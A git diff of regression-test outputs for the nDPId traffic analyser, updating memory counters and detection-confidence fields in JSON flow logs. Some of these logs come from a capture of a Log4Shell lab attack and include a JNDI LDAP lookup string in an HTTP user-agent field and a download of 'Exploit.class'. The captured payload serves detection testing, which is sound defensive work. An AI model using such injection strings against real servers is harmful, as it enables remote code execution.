00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":3790,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1597152712034} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 30/30 @@ -33,9 +33,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5877589 bytes -~~ total memory freed........: 5877589 bytes -~~ total allocations/frees...: 118158/118158 +~~ total memory allocated....: 6011223 bytes +~~ total memory freed........: 6011223 bytes +~~ total allocations/frees...: 120920/120920 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 472 chars ~~ json string max len.......: 690 chars diff --git a/test/results/log4j-webapp-exploit.pcap.out b/test/results/log4j-webapp-exploit.pcap.out index 0e734933d..71ffc0bec 100644 --- a/test/results/log4j-webapp-exploit.pcap.out +++ b/test/results/log4j-webapp-exploit.pcap.out @@ -4,7 +4,7 @@ 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639425815407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADxjYEAAPQamLqwQ7gGsEO4KB8AfkHmWgrEAAAAAoAL68JU2AAACBAW0BAIICq34shoAAAAAAQMDBw=="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639425815407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADwAAEAAQAYGj6wQ7gqsEO4BH5AHwIo9\/lB5loKyoBJxIDRcAAACBAW0BAIICmhBAYSt+LIaAQMDBw=="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639425815408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815408,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADRjYUAAPQamNawQ7gGsEO4KB8AfkHmWgrKKPf5RgBAB9sqWAAABAQgKrfiyHGhBAYQ="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815407,"flow_last_seen":1639425815415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":646,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1639425815415,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.13.31","url":"192.168.13.31:8080\/log4shell\/login","code":0,"content_type":"","user_agent":"jndi:ldap:\/\/172.16.238.11:1389\/a"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815407,"flow_last_seen":1639425815415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":646,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1639425815415,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.13.31","url":"192.168.13.31:8080\/log4shell\/login","code":0,"content_type":"","user_agent":"jndi:ldap:\/\/172.16.238.11:1389\/a"}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":113,"packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425815682} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815415,"pkt":"AAQAAQAGAkKsEO4KAAAIBgABCAAGBAABAkKsEO4KrBDuCgAAAAAAAKwQ7gs="} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":113,"packet_id":7,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425815682} @@ -13,13 +13,13 @@ 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639425815682,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815682,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADycRUAAQAZqP6wQ7gqsEO4L4TIFbQLNSvsAAAAAoAJyEDRmAAACBAW0BAIICvIpEmgAAAAAAQMDBw=="} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1639425815683,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815683,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hMnt33KkCzUr8oBJxIDRmAAACBAW0BAIICingw2TyKRJoAQMDBw=="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1639425815683,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815683,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADScRkAAQAZqRqwQ7gqsEO4L4TIFbQLNSvx7d9yqgBAA5TReAAABAQgK8ikSaCngw2Q="} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815682,"flow_last_seen":1639425815692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425815692,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815682,"flow_last_seen":1639425815692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425815692,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815910,"flow_last_seen":1639425815910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815910,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1639425815910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzhTUAAQAYlN6wQ7gqsEO4LvTwAUKwpPLEAAAAAoAJyEDRmAAACBAW0BAIICvIpE0sAAAAAAQMDBw=="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1639425815910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9PH3sGAysKTyyoBJxIDRmAAACBAW0BAIICingxEfyKRNLAQMDBw=="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1639425815910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADThTkAAQAYlPqwQ7gqsEO4LvTwAUKwpPLJ97BgNgBAA5TReAAABAQgK8ikTSyngxEc="} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815910,"flow_last_seen":1639425815913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425815913,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} -01050{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425815910,"flow_last_seen":1639425815916,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425815916,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815910,"flow_last_seen":1639425815913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425815913,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} +01050{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425815910,"flow_last_seen":1639425815916,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425815916,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815944,"flow_last_seen":1639425815944,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815944,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1639425815944,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADw8h0AAQAZP8awQ7goKCgof2HAjKVh5kSAAAAAAoAJyEK5yAAACBAW0BAIICq5YAo8AAAAAAQMDBw=="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1639425815944,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADwAAEAAQAaMeAoKCh+sEO4KIynYcLp2lFRYeZEhoBJxIK5yAAACBAW0BAIICiCvi5+uWAKPAQMDBw=="} @@ -33,24 +33,24 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1639425834628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNdkAAQAa5DqwQ7gqsEO4L4Y4FbXfaWIQAAAAAoAJyEDRmAAACBAW0BAIICvIpXGkAAAAAAQMDBw=="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1639425834628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hjinD15132liFoBJxIDRmAAACBAW0BAIICinhDWbyKVxpAQMDBw=="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1639425834628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADRNd0AAQAa5FawQ7gqsEO4L4Y4FbXfaWIUpw9eegBAA5TReAAABAQgK8ilcainhDWY="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834628,"flow_last_seen":1639425834629,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425834629,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834628,"flow_last_seen":1639425834629,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425834629,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834639,"flow_last_seen":1639425834639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834639,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1639425834639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzOBEAAQAY4gKwQ7gqsEO4LvZYAUJNLn5gAAAAAoAJyEDRmAAACBAW0BAIICvIpXHQAAAAAAQMDBw=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1639425834639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9lr\/2uzmTS5+ZoBJxIDRmAAACBAW0BAIICinhDXHyKVx0AQMDBw=="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1639425834639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADTOBUAAQAY4h6wQ7gqsEO4LvZYAUJNLn5m\/9rs6gBAA5TReAAABAQgK8ilcdSnhDXE="} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834639,"flow_last_seen":1639425834640,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425834640,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} -01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425834639,"flow_last_seen":1639425834641,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425834641,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834639,"flow_last_seen":1639425834640,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425834640,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} +01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425834639,"flow_last_seen":1639425834641,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425834641,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834645,"flow_last_seen":1639425834645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834645,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 